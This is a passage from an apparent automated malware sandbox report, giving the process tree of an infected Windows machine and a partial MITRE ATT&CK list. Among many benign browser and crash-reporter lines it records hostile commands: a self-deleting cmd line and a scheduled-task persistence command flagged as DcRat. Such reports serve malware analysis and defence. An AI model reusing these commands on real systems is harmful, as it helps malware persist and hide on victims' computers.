      4⤵
      PID:1176
  - - C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
      4⤵
      PID:5456
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
      4⤵
      PID:5136
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:2260
- C:\Users\Admin\AppData\Local\Temp\1000645001\InstallSetup3.exe
  "C:\Users\Admin\AppData\Local\Temp\1000645001\InstallSetup3.exe"
  2⤵
  PID:5636
- - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
    3⤵
    PID:5996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
      4⤵
      PID:1240
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:2148
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:4660
- - C:\Users\Admin\AppData\Local\Temp\nso3989.tmp
    C:\Users\Admin\AppData\Local\Temp\nso3989.tmp
    3⤵
    PID:6576
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6576 -s 2296
      4⤵
      Program crash
      PID:3592
- C:\Users\Admin\AppData\Local\Temp\1000646001\father1.exe
  "C:\Users\Admin\AppData\Local\Temp\1000646001\father1.exe"
  2⤵
  PID:4164
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4516
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1080
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5052 -ip 5052
1⤵
PID:5104

\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3588

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3024

C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe
1⤵
PID:6112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:2936

C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
1⤵
PID:2664
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5744
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:5124
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:2632
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:2740
- - C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
    "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe"
    3⤵
    PID:6100
  - - C:\Windows\system32\conhost.exe
      conhost.exe
      4⤵
      PID:6448
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:5944

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\ab3e4e53fd0e4312acd3f13973eeaaaf /t 6076 /p 5996
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5572 -ip 5572
1⤵
PID:5508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5608 -ip 5608
1⤵
PID:6612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5608 -ip 5608
1⤵
PID:5496

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:7176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 6576 -ip 6576
1⤵
PID:7640

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:6288

C:\Users\Admin\AppData\Roaming\dhgrwrr
C:\Users\Admin\AppData\Roaming\dhgrwrr
1⤵
PID:1240
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 348
  2⤵
  - Program crash
  PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1240 -ip 1240
1⤵
PID:5204

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:7756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff725246f8,0x7fff72524708,0x7fff72524718
  2⤵
  PID:3188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
  2⤵
  PID:856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
  2⤵
  PID:9200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
  2⤵
  PID:9476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:9544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:9552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:6664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4248 /prefetch:1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3820
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
  2⤵
  PID:8096
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
  2⤵
  PID:8068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
  2⤵
  PID:4600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
  2⤵
  PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=180 /prefetch:1
  2⤵
  PID:9940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5748 /prefetch:8
  2⤵
  PID:2460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5568 /prefetch:8
  2⤵
  PID:8764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:1
  2⤵
  PID:5156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:5732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:8796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
  2⤵
  PID:1368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
  2⤵
  PID:10064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
  2⤵
  PID:7812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
  2⤵
  PID:7288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:1
  2⤵
  PID:3356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
  2⤵
  PID:6784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1
  2⤵
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1888 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
  2⤵
  PID:5904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:6388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6508 /prefetch:8
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1780 /prefetch:8
  2⤵
  PID:6664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7476 /prefetch:8
  2⤵
  PID:2336
- C:\Users\Admin\Downloads\eset_smart_security_premium_live_installer.exe
  "C:\Users\Admin\Downloads\eset_smart_security_premium_live_installer.exe"
  2⤵
  PID:8376
- - C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\eset_smart_security_premium_live_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\eset_smart_security_premium_live_installer.exe" --bts-container 8376 "C:\Users\Admin\Downloads\eset_smart_security_premium_live_installer.exe"
    3⤵
    PID:892
  - - C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\acstest.exe
      "C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\acstest.exe"
      4⤵
      PID:9056
  - - C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\BootHelper.exe
      "C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\BootHelper.exe" --watchdog 892 --product "ESET Live Installer" 17.0.2.0 1033
      4⤵
      PID:6396
  - - C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\acstest.exe
      "C:\Users\Admin\AppData\Local\Temp\eset\bts.session\804c572a-f86b-4979-9cc6-94ec4a2f9433\acstest.exe"
      4⤵
      PID:7212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2980 /prefetch:2
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
  2⤵
  PID:6632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
  2⤵
  PID:6556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
  2⤵
  PID:6752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7836 /prefetch:1
  2⤵
  PID:1804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8052 /prefetch:1
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8204 /prefetch:1
  2⤵
  PID:10144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8344 /prefetch:1
  2⤵
  PID:8776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8392 /prefetch:1
  2⤵
  PID:7044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8360 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,10026976528631919783,3366106665147083853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8820 /prefetch:1
  2⤵
  PID:9576

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8124 -ip 8124
1⤵
PID:10536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 544 -ip 544
1⤵
PID:10572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

